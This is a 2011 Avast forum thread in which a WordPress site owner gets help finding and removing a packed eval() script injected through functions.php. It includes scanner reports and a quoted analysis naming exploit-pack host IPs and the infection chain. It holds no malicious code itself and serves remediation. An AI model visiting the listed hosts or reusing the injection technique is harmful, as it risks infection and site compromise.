Avast WEBforum
Other => Viruses and worms => Topic started by: pieter_dj on December 10, 2011, 09:13:31 PM
-
my site is -http//www.gadget-talk.com I have see the source of my site, but i cannot find the malware script like the people said in this forum about this thread before. What should I do to remove the malware? Help me please. When I browse my site, Avast blocked me and showing the site is infected with the "JS:Redirector-MR [Trj]" Trojan. Can you give me step by step wolution what to do?
-
Hi, pieter_dj, welcome to the forum :)
The code is embedded in the last line (very long) of the source code of the page.
Look in the middle of the code for the script.
A search for eval( will reveal the embedded code.
Scott
-
From Sucuri...
1. Wordpress internal path: /home/bermain/public_html/gadget-talk.com/wp-content/themes/welding/index.php Wordpress version outdated: Upgrade required.
2. Malware found on javascript file:
hxxp://www.gadget-talk.com/404javascript.js (Just an example, there are many more..!!)
Known Spam detected.
Details: http://sucuri.net/malware/entry/MW:SPAM:SEO
-
Sucuri report malware found here
-http://www.gadget-talk.com/
-http://www.gadget-talk.com/404javascript.js
-http://www.gadget-talk.com/404testpage4525d2fdc
-http://www.gadget-talk.com/about-us/
-http://www.gadget-talk.com/sitemap/
-http://www.gadget-talk.com/contact-us/
-http://www.gadget-talk.com/useful-links/
-http://www.gadget-talk.com/category/apple/
-http://www.gadget-talk.com/category/camera-camcorder/
-http://www.gadget-talk.com/category/cellularphone/
MDetails: We have many articles about this issue on our blog:
http://blog.sucuri.net/category/spam
wepawet
http://wepawet.iseclab.org/view.php?hash=818126a161566b21f078488d90919a66&t=1323548465&type=js
-
Hi Asyn and Pondus,
Verdict = malicious: http://urlquery.net/report.php?id=11280
See for the second link Pondus gave:
-rcm.amazon.com/e/cm?t=onlineforex06-20&o=1&p=12&l=ur1&category=-amazonwireless&banner=13A670EB10W0N2FZPE02&f=ifr suspicious
[suspicious:2] (ipaddr:72.21.207.5) (iframe) -rcm.amazon.com/e/cm?t=onlineforex06-20&o=1&p=12&l=ur1&category=-amazonwireless&banner=13A670EB10W0N2FZPE02&f=ifr
status: (referer=-www.gadget-talk.com/404javascript.js)saved 2247 bytes 5cdcd519ab333c7e372f364dfa8bb5f38df93348
info: [img] -ecx.images-amazon.com/images/G/01/img10/associates/med-rec/aw-gen-300x250.gif
info: [iframe] -s.amazon-adsystem.com/iu3?d=assoc-amazon.com&rP=
info: [decodingLevel=0] found JavaScript
error: line:3: SyntaxError: missing ) after argument list:
error: line:3: ; function encodeStr(b) { return b && encodeURIComponent(b).replace(/&/g, "&").replace(/"/g, """).replace(/</g, "<").replace( />/g, ">"); } document.write("<iframe src="-http:/s.amazon-adsystem.com/iu3?d=assoc-amazon.com&rP=" + encodeStr( ( error: line:3:
could be the response of this now dead?
polonus
-
Yes pol, the OP has to clean up his site..! ;)
-
why i can't find the script in the source code of the site? I really don't know what to do to delete the code. Could you give me a detail step by step explanation how to delete the code? If I go to my hosting, then I go to what file name and where I will find that script so I can delete the code? So what should I do to get rid of this "Dean" issue?
-
A search for eval( will reveal the embedded code.
Highlight the embedded code in spg SCOTT's picture and press delete.
-
Sucuri will do it for you ;)
.....but not for free :-\ http://sucuri.net/signup
-
Isn't it removed?
No, it isn't and I also never said so.
I said that he has to clean it, thought I was clear.
-
Isn't it removed?
No, it isn't and I also never said so.
I said that he has to clean it, thought I was clear.
Didn't see the 'has to' part. :-[
More information about the malware dump: http://sucuri.net/new-malware-evalfunctionpacked.html
-
Can't you give me the steps how to delete that scripts that contain p,a,c,k,e,r from my site? Please give me the detail step like when I go to my hosting, I should go to what folder or file? Because I am using wordpress. How to delete that script from the html code? I am confuse.
-
Again PHP has initially been compromised. Very interesting read link here: http://25yearsofprogramming.com/php/findmaliciouscode.htm (source author: Steven Whitney)
polonus
-
Could you remove that script (modify your post) incase it prompts an alert.
Done, thanks David.
That looks like it *may* be what is adding the code to the pages in the site.
Remove that code (from functions.php), and check all of your pages (html/php/js) files etc. for this eval script.
-
I have removed the original post, to remove suspect code to avoid avast alerting on its own pages.
I have find this in my functions.php file
See image of code example
Can you help me from that code, I should delete the scripts that contains p,a,c,k,e,r from where to where?
-
should I delete the whole of php code or only the javascript code? Just now I only delete the javascript code. I see it has solved the problem. Oh should I delete the php code also? waht do you think spg SCOTT and DavidR ?
-
do not post code in the forum as avast may alarm on it
-
Again please post any script examples as images not live code, which could cause an alert.
Thank you very much, spg SCOTT. I have removed the code, but I only remove the javascript code, not the whole of PHP code. so the script now has been like this.
<snip>
Can you check to browse my site again? I think the problem has solved, right? I only need to solve that "Dean Edwards" malware not appear again each time I browse my site.
-
It seems that the added code in the functions.php was what added the malicious code to the pages as they were created. I can't see the code within the page now.
You also need to ensure that your wordpress version is updated:
From Sucuri...
1. Wordpress internal path: /home/bermain/public_html/gadget-talk.com/wp-content/themes/welding/index.php Wordpress version outdated: Upgrade required.
...
-
I am sorry, I don't know that the code can make avast alert to this forum. I am apologize. I am cuious, how to see the code in the source code. Because when I see the source code of my site, I can't find that code before I delete that javascript code. I use opera browser. I click menu view and click source, but I can't find the code before I delete the javascript in functions.php. I am curious how you can find the code spg SCOTT ?
-
Hi folks,
When I do a search query on that malcode on http://sucuri.net/new-malware-evalfunctionpacked.html
and go and try to visit: -http://jsunpack.jeek.org/dec/go?report=961a36cb8a1f4c17e1974106b061279928f04583 immediately avast Web Shield blocks connection to it and alerts for as JS:Agent-HA[Trj]
polonus
-
I am sorry, I don't know that the code can make avast alert to this forum. I am apologize. I am cuious, how to see the code in the source code. Because when I see the source code of my site, I can't find that code before I delete that javascript code. I use opera browser. I click menu view and click source, but I can't find the code before I delete the javascript in functions.php. I am curious how you can find the code spg SCOTT ?
Scott is using a program called Malzilla
-
Avast is right here, see what was reported here: http://blog.armorize.com/2011/10/mass-wordpress-infection-ongoing-most.html link authors Wayne Huang, Chris Hsiao, NightCola Lin.
Quote from there: 1. Location of injected script: in the index page of the compromised website.
2. Means of compromise: we believe via a combination of a) stolen WordPress passwords b) backdoors into previously compromised WordPress websites and c) Automated script-injection tools that work in combination of either (a) or (b).
3. Injected script: In the [Details] section we've included an example of an injected script. There are more than 20 variations.
4. Script packer used: Dean Edwards' packer.
5. Malware: Multiple malware will be installed (dropped) onto the visitors machines without the users' knowledge. Antivirus detection rate is around 5 out of 43 vendors on VirusTotal at the time of this writing.
6. Infected websites: A lot of WordPress websites have been hit, a sample list is as follows:
Now the way the infection goes he injection has a simple chain:
1. Index page of a WordPress site is injected with script packed by Dean Edwards' packer
2. Javascript generates iframe to a malicious domain registered with changeip.com
3. Browser loads the exploit pack from the malicious domain, hosting on a few fixed IPs including 95.163.66.209 (Russia), 64.131.75.19 (USA), and 182.18.185.82 (India).
Link authors: Wayne Huang, Chris Hsiao, NightCola Lin at Armorize malware Blog
polonus
-
Avast is right here...
Sure avast! is right, I guess we can all agree on that.
Also read here: http://blog.sucuri.net/2011/09/mass-spam-infection-from-wplinksforwork-com-50k-wordpress-sites-hacked.html
-
Hi Asyn,
Again this shows how important it is for webmasters to continuously update their website software, here Wordpress, and initially for them to secure their WordPress passwords for instance with the Chap Secure Login plug-in for instance , or one could use an online secret key generator: https://api.wordpress.org/secret-key/1.1/salt/
polonus
-
Again this shows how important it is for webmasters to continuously update their website software, here Wordpress...
+1
-
Hi folks, if there is a Dean Edwards packer, there is also an unpacker:
http://dean.edwards.name/unpacker/
Enjoy,
pol